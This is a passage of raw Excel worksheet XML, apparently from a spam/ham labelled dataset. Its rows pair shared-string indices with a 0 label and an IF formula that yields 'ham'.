    <row r="5105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5105" t="s">
        <v>4440</v>
      </c>
      <c r="B5105">
        <v>0</v>
      </c>
      <c r="C5105" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5106" t="s">
        <v>4441</v>
      </c>
      <c r="B5106">
        <v>0</v>
      </c>
      <c r="C5106" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5107" t="s">
        <v>4442</v>
      </c>
      <c r="B5107">
        <v>0</v>
      </c>
      <c r="C5107" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5108" t="s">
        <v>4443</v>
      </c>
      <c r="B5108">
        <v>0</v>
      </c>
      <c r="C5108" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5109" t="s">
        <v>4444</v>
      </c>
      <c r="B5109">
        <v>0</v>
      </c>
      <c r="C5109" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5110" t="s">
        <v>4445</v>
      </c>
      <c r="B5110">
        <v>0</v>
      </c>
      <c r="C5110" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5111" t="s">
        <v>4446</v>
      </c>
      <c r="B5111">
        <v>0</v>
      </c>
      <c r="C5111" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5112" t="s">
        <v>4447</v>
      </c>
      <c r="B5112">
        <v>0</v>
      </c>
      <c r="C5112" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5113" t="s">
        <v>21</v>
      </c>
      <c r="B5113">
        <v>0</v>
      </c>
      <c r="C5113" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5114" t="s">
        <v>4448</v>
      </c>
      <c r="B5114">
        <v>0</v>
      </c>
      <c r="C5114" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5115" t="s">
        <v>21</v>
      </c>
      <c r="B5115">
        <v>0</v>
      </c>
      <c r="C5115" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5116" t="s">
        <v>21</v>
      </c>
      <c r="B5116">
        <v>0</v>
      </c>
      <c r="C5116" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5117" t="s">
        <v>21</v>
      </c>
      <c r="B5117">
        <v>0</v>
      </c>
      <c r="C5117" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5118" t="s">
        <v>21</v>
      </c>
      <c r="B5118">
        <v>0</v>
      </c>
      <c r="C5118" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5119" t="s">
        <v>21</v>
      </c>
      <c r="B5119">
        <v>0</v>
      </c>
      <c r="C5119" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5120" t="s">
        <v>4449</v>
      </c>
      <c r="B5120">
        <v>0</v>
      </c>
      <c r="C5120" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5121" t="s">
        <v>4450</v>
      </c>
      <c r="B5121">
        <v>0</v>
      </c>
      <c r="C5121" t="str">
        <f t="shared" si="79"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5122" t="s">
        <v>4451</v>
      </c>
      <c r="B5122">
        <v>0</v>
      </c>
      <c r="C5122" t="str">
        <f t="shared" ref="C5122:C5185" si="80">IF(B5122="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5123" t="s">
        <v>4452</v>
      </c>
      <c r="B5123">
        <v>0</v>
      </c>
      <c r="C5123" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5124" t="s">
        <v>4453</v>
      </c>
      <c r="B5124">
        <v>0</v>
      </c>
      <c r="C5124" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5125" t="s">
        <v>4454</v>
      </c>
      <c r="B5125">
        <v>0</v>
      </c>
      <c r="C5125" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5126" t="s">
        <v>4455</v>
      </c>
      <c r="B5126">
        <v>0</v>
      </c>
      <c r="C5126" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5127" t="s">
        <v>4456</v>
      </c>
      <c r="B5127">
        <v>0</v>
      </c>
      <c r="C5127" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5128" t="s">
        <v>4457</v>
      </c>
      <c r="B5128">
        <v>0</v>
      </c>
      <c r="C5128" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5129" t="s">
        <v>4458</v>
      </c>
      <c r="B5129">
        <v>0</v>
      </c>
      <c r="C5129" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5130" t="s">
        <v>21</v>
      </c>
      <c r="B5130">
        <v>0</v>
      </c>
      <c r="C5130" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5131" t="s">
        <v>4459</v>
      </c>
      <c r="B5131">
        <v>0</v>
      </c>
      <c r="C5131" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5132" t="s">
        <v>21</v>
      </c>
      <c r="B5132">
        <v>0</v>
      </c>
      <c r="C5132" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5133" t="s">
        <v>4460</v>
      </c>
      <c r="B5133">
        <v>0</v>
      </c>
      <c r="C5133" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5134" t="s">
        <v>4461</v>
      </c>
      <c r="B5134">
        <v>0</v>
      </c>
      <c r="C5134" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5135" t="s">
        <v>4462</v>
      </c>
      <c r="B5135">
        <v>0</v>
      </c>
      <c r="C5135" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5136" t="s">
        <v>4463</v>
      </c>
      <c r="B5136">
        <v>0</v>
      </c>
      <c r="C5136" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5137" t="s">
        <v>21</v>
      </c>
      <c r="B5137">
        <v>0</v>
      </c>
      <c r="C5137" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5138" t="s">
        <v>21</v>
      </c>
      <c r="B5138">
        <v>0</v>
      </c>
      <c r="C5138" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5139" t="s">
        <v>4464</v>
      </c>
      <c r="B5139">
        <v>0</v>
      </c>
      <c r="C5139" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5140" t="s">
        <v>4465</v>
      </c>
      <c r="B5140">
        <v>0</v>
      </c>
      <c r="C5140" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5141" t="s">
        <v>4466</v>
      </c>
      <c r="B5141">
        <v>0</v>
      </c>
      <c r="C5141" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5142" t="s">
        <v>4467</v>
      </c>
      <c r="B5142">
        <v>0</v>
      </c>
      <c r="C5142" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5143" t="s">
        <v>4468</v>
      </c>
      <c r="B5143">
        <v>0</v>
      </c>
      <c r="C5143" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5144" t="s">
        <v>4469</v>
      </c>
      <c r="B5144">
        <v>0</v>
      </c>
      <c r="C5144" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5145" t="s">
        <v>4470</v>
      </c>
      <c r="B5145">
        <v>0</v>
      </c>
      <c r="C5145" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5146" t="s">
        <v>4471</v>
      </c>
      <c r="B5146">
        <v>0</v>
      </c>
      <c r="C5146" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5147" t="s">
        <v>4472</v>
      </c>
      <c r="B5147">
        <v>0</v>
      </c>
      <c r="C5147" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5148" t="s">
        <v>4472</v>
      </c>
      <c r="B5148">
        <v>0</v>
      </c>
      <c r="C5148" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5149" t="s">
        <v>4473</v>
      </c>
      <c r="B5149">
        <v>0</v>
      </c>
      <c r="C5149" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5150" t="s">
        <v>4474</v>
      </c>
      <c r="B5150">
        <v>0</v>
      </c>
      <c r="C5150" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5151" t="s">
        <v>21</v>
      </c>
      <c r="B5151">
        <v>0</v>
      </c>
      <c r="C5151" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5152" t="s">
        <v>4475</v>
      </c>
      <c r="B5152">
        <v>0</v>
      </c>
      <c r="C5152" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5153" t="s">
        <v>4476</v>
      </c>
      <c r="B5153">
        <v>0</v>
      </c>
      <c r="C5153" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5154" t="s">
        <v>4477</v>
      </c>
      <c r="B5154">
        <v>0</v>
      </c>
      <c r="C5154" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5155" t="s">
        <v>4478</v>
      </c>
      <c r="B5155">
        <v>0</v>
      </c>
      <c r="C5155" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5156" t="s">
        <v>4479</v>
      </c>
      <c r="B5156">
        <v>0</v>
      </c>
      <c r="C5156" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5157" t="s">
        <v>4480</v>
      </c>
      <c r="B5157">
        <v>0</v>
      </c>
      <c r="C5157" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5158" t="s">
        <v>4481</v>
      </c>
      <c r="B5158">
        <v>0</v>
      </c>
      <c r="C5158" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5159" t="s">
        <v>4482</v>
      </c>
      <c r="B5159">
        <v>0</v>
      </c>
      <c r="C5159" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5160" t="s">
        <v>4483</v>
      </c>
      <c r="B5160">
        <v>0</v>
      </c>
      <c r="C5160" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5161" t="s">
        <v>4484</v>
      </c>
      <c r="B5161">
        <v>0</v>
      </c>
      <c r="C5161" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5162" t="s">
        <v>4485</v>
      </c>
      <c r="B5162">
        <v>0</v>
      </c>
      <c r="C5162" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5163" t="s">
        <v>4486</v>
      </c>
      <c r="B5163">
        <v>0</v>
      </c>
      <c r="C5163" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5164" t="s">
        <v>4487</v>
      </c>
      <c r="B5164">
        <v>0</v>
      </c>
      <c r="C5164" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5165" t="s">
        <v>4488</v>
      </c>
      <c r="B5165">
        <v>0</v>
      </c>
      <c r="C5165" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5166" t="s">
        <v>4489</v>
      </c>
      <c r="B5166">
        <v>0</v>
      </c>
      <c r="C5166" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5167" t="s">
        <v>4490</v>
      </c>
      <c r="B5167">
        <v>0</v>
      </c>
      <c r="C5167" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5168" t="s">
        <v>4491</v>
      </c>
      <c r="B5168">
        <v>0</v>
      </c>
      <c r="C5168" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5169" t="s">
        <v>4492</v>
      </c>
      <c r="B5169">
        <v>0</v>
      </c>
      <c r="C5169" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5170" t="s">
        <v>21</v>
      </c>
      <c r="B5170">
        <v>0</v>
      </c>
      <c r="C5170" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5171" t="s">
        <v>4493</v>
      </c>
      <c r="B5171">
        <v>0</v>
      </c>
      <c r="C5171" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5172" t="s">
        <v>4494</v>
      </c>
      <c r="B5172">
        <v>0</v>
      </c>
      <c r="C5172" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5173" t="s">
        <v>4495</v>
      </c>
      <c r="B5173">
        <v>0</v>
      </c>
      <c r="C5173" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5174" t="s">
        <v>4496</v>
      </c>
      <c r="B5174">
        <v>0</v>
      </c>
      <c r="C5174" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5175" t="s">
        <v>4497</v>
      </c>
      <c r="B5175">
        <v>0</v>
      </c>
      <c r="C5175" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5176" t="s">
        <v>4498</v>
      </c>
      <c r="B5176">
        <v>0</v>
      </c>
      <c r="C5176" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5177" t="s">
        <v>4499</v>
      </c>
      <c r="B5177">
        <v>0</v>
      </c>
      <c r="C5177" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5178" t="s">
        <v>4500</v>
      </c>
      <c r="B5178">
        <v>0</v>
      </c>
      <c r="C5178" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5179" t="s">
        <v>4501</v>
      </c>
      <c r="B5179">
        <v>0</v>
      </c>
      <c r="C5179" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5180" t="s">
        <v>21</v>
      </c>
      <c r="B5180">
        <v>0</v>
      </c>
      <c r="C5180" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5181" t="s">
        <v>4502</v>
      </c>
      <c r="B5181">
        <v>0</v>
      </c>
      <c r="C5181" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5182" t="s">
        <v>4503</v>
      </c>
      <c r="B5182">
        <v>0</v>
      </c>
      <c r="C5182" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5183" t="s">
        <v>4504</v>
      </c>
      <c r="B5183">
        <v>0</v>
      </c>
      <c r="C5183" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5184" t="s">
        <v>4505</v>
      </c>
      <c r="B5184">
        <v>0</v>
      </c>
      <c r="C5184" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5185" t="s">
        <v>4506</v>
      </c>
      <c r="B5185">
        <v>0</v>
      </c>
      <c r="C5185" t="str">
        <f t="shared" si="80"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5186" t="s">
        <v>21</v>
      </c>
      <c r="B5186">
        <v>0</v>
      </c>
      <c r="C5186" t="str">
        <f t="shared" ref="C5186:C5249" si="81">IF(B5186="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="5187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5187" t="s">
        <v>4507</v>
      </c>
      <c r="B5187">
        <v>0</v>
      </c>
      <c r="C5187" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5188" t="s">
        <v>21</v>
      </c>
      <c r="B5188">
        <v>0</v>
      </c>
      <c r="C5188" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5189" t="s">
        <v>21</v>
      </c>
      <c r="B5189">
        <v>0</v>
      </c>
      <c r="C5189" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5190" t="s">
        <v>21</v>
      </c>
      <c r="B5190">
        <v>0</v>
      </c>
      <c r="C5190" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5191" t="s">
        <v>4508</v>
      </c>
      <c r="B5191">
        <v>0</v>
      </c>
      <c r="C5191" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5192" t="s">
        <v>4509</v>
      </c>
      <c r="B5192">
        <v>0</v>
      </c>
      <c r="C5192" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5193" t="s">
        <v>4510</v>
      </c>
      <c r="B5193">
        <v>0</v>
      </c>
      <c r="C5193" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5194" t="s">
        <v>4511</v>
      </c>
      <c r="B5194">
        <v>0</v>
      </c>
      <c r="C5194" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5195" t="s">
        <v>4512</v>
      </c>
      <c r="B5195">
        <v>0</v>
      </c>
      <c r="C5195" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5196" t="s">
        <v>4513</v>
      </c>
      <c r="B5196">
        <v>0</v>
      </c>
      <c r="C5196" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5197" t="s">
        <v>4514</v>
      </c>
      <c r="B5197">
        <v>0</v>
      </c>
      <c r="C5197" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5198" t="s">
        <v>4515</v>
      </c>
      <c r="B5198">
        <v>0</v>
      </c>
      <c r="C5198" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5199" t="s">
        <v>4516</v>
      </c>
      <c r="B5199">
        <v>0</v>
      </c>
      <c r="C5199" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5200" t="s">
        <v>4517</v>
      </c>
      <c r="B5200">
        <v>0</v>
      </c>
      <c r="C5200" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5201" t="s">
        <v>4518</v>
      </c>
      <c r="B5201">
        <v>0</v>
      </c>
      <c r="C5201" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5202" t="s">
        <v>4519</v>
      </c>
      <c r="B5202">
        <v>0</v>
      </c>
      <c r="C5202" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5203" t="s">
        <v>4520</v>
      </c>
      <c r="B5203">
        <v>0</v>
      </c>
      <c r="C5203" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5204" t="s">
        <v>4521</v>
      </c>
      <c r="B5204">
        <v>0</v>
      </c>
      <c r="C5204" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5205" t="s">
        <v>4522</v>
      </c>
      <c r="B5205">
        <v>0</v>
      </c>
      <c r="C5205" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5206" t="s">
        <v>4523</v>
      </c>
      <c r="B5206">
        <v>0</v>
      </c>
      <c r="C5206" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5207" t="s">
        <v>4524</v>
      </c>
      <c r="B5207">
        <v>0</v>
      </c>
      <c r="C5207" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5208" t="s">
        <v>4525</v>
      </c>
      <c r="B5208">
        <v>0</v>
      </c>
      <c r="C5208" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5209" t="s">
        <v>4526</v>
      </c>
      <c r="B5209">
        <v>0</v>
      </c>
      <c r="C5209" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5210" t="s">
        <v>4527</v>
      </c>
      <c r="B5210">
        <v>0</v>
      </c>
      <c r="C5210" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5211" t="s">
        <v>4528</v>
      </c>
      <c r="B5211">
        <v>0</v>
      </c>
      <c r="C5211" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5212" t="s">
        <v>4529</v>
      </c>
      <c r="B5212">
        <v>0</v>
      </c>
      <c r="C5212" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5213" t="s">
        <v>4530</v>
      </c>
      <c r="B5213">
        <v>0</v>
      </c>
      <c r="C5213" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5214" t="s">
        <v>4531</v>
      </c>
      <c r="B5214">
        <v>0</v>
      </c>
      <c r="C5214" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5215" t="s">
        <v>4532</v>
      </c>
      <c r="B5215">
        <v>0</v>
      </c>
      <c r="C5215" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5216" t="s">
        <v>4533</v>
      </c>
      <c r="B5216">
        <v>0</v>
      </c>
      <c r="C5216" t="str">
        <f t="shared" si="81"/>
        <v>ham</v>
      </c>
    </row>
    <row r="5217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5217" t="s">
        <v>4534</v>
      </c>
